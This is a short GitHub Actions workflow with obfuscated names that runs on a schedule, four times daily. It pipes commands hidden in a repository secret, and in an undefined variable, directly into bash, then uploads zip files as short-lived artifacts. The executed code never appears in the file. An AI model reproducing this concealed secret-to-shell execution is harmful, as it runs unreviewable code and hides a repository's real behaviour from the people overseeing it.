name: zhongyanguangheng
on:
  workflow_dispatch:

  schedule:
    - cron: '50 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhongyanguangheng
        env:
          gnmvw6557: ${{ secrets.gnmvw6557 }}
        run: |
          printf '%s' "$gnmvw6557" | jq -r .hyxvr11839 | /bin/bash
          echo $tjdc09 | jq -r .spydb73 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 5Uh8g7mt
          path: "*.zip"
          retention-days: 1
